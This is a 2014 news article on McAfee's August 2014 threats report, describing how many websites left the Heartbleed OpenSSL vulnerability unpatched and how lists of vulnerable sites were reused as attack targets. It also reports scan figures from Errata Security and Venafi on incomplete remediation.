Heartbleed patch efforts ignored on thousands of websites
Data from McAfee shows many organizations have yet to fully patch the Heartbleed vulnerability, and as many as 300,000 websites remain at risk.
A cybersecurity vendor is warning that a public listing of websites susceptible to the recent Heartbleed OpenSLL vulnerability, which was created to assist users wanting to authenticate a site, has since been used by hackers to identify unpatched sites -- and to continue trolling for personal information.
In its newly released August 2014 threats report, Santa Clara-based McAfee Inc.'s McAfee Labs research team also cited an estimate that more than 300,000 websites remain unpatched and vulnerable to Heartbleed as cybercriminals successfully transformed a roster of vulnerable sites into a "hit list" to identify new attack targets.
Defining Heartbleed as "the most significant security event" since last holiday season's Target Corp. data breach, McAfee warned that many applications, websites and devices that remain unpatched are almost certain to be attacked, "despite the plethora of available tools" available to secure affected systems. Hence, Heartbleed's aftermath may well serve as "another cybercrime opportunity," the security firm warned.
A wide range of free tools and other security resources quickly emerged from vendors and security professionals after the disclosure of the Heartbleed vulnerability, known as CVE-2014-0160, on April 7. The vulnerability targeted OpenSSL, creating a vulnerability -- or malformed "heartbeat" -- that allowed hackers to access data in memory via thetransport layer security (TLS) crypto protocol. (The TLS "heartbeat" ensures that both client and server can communicate with one another.)
Given the popularity of OpenSSL running on commercial servers, McAfee estimates that Heartbleed affected an estimated 17% of websites using TLS, including some of the most visited sites on the Internet -- although it did not name them.
Heartbleed tools: Interest waning?
The McAfee report went on to document a familiar scenario: The widely publicized vulnerability quickly generated a large number of free tools and resources to help secure affected sites, but use of those tools has appeared to decline rapidly.
For example, McAfee's free Stinger scanning tool was used more than 200,000 times one week after Heartbleed surfaced. Stinger uses remained above 200,000 the next day, April 15. By April 18, however, McAfee said daily scans using its scanning tool had plummeted to less than 50,000.
Another free tool, called "heartleech," tests for Heartbleed vulnerability, then stores leaked data to scan it for private keys. McAfee said the GitHub tool also sidesteps some forms of intrusion detection, allowing network administrators to both detect vulnerabilities and extract any sensitive keys.
Despite broad availability of such tools, other malicious tools like Project Un1c0rn soon followed, to prey on the list of compromised sites by attempting to make vulnerable public IPs searchable.
"Although it is likely that nearly all of the world's most important websites have been patched for Heartbleed, a large number of small-site owners … are still unaware that they are vulnerable," the McAfee report warned.
'Potentially vulnerable targets' still high
In the aftermath of the Heartbleed attack, McAfee said it ran a search and found 2,440 "potentially vulnerable targets." However, at least one security analyst, Robert Graham of Errata Security, has warned that perhaps 300,000 sites remain vulnerable.
A July report from key management technology vendor Venafi Inc. showed that 99% of the 460,000 Heartbleed-vulnerable hosts at Global 2000 organizations had been patched, but organizations failed to generate new encryption keys, issue new security certificates or revoke their old certificates, all of which are necessary to completely remediate Heartbleed.
Graham reported in a June 21 blog post that the security firm identified 600,000 vulnerable systems immediately after Heartbleed was disclosed. A scan just over two months later revealed 309,197 vulnerable sites, Graham found.
"This indicates people have stopped even trying to patch," he added. "We should see a slow decrease over the next decade, as older systems are slowly replaced. Even a decade from now, though, I still expect to find thousands of systems, including critical ones, still vulnerable [to Heartbleed]."
- Expert Nick Lewis says Heartbleed offers lessons in incident response.
- Learn how the University of Michigan managed its successful Heartlbeed patching effort.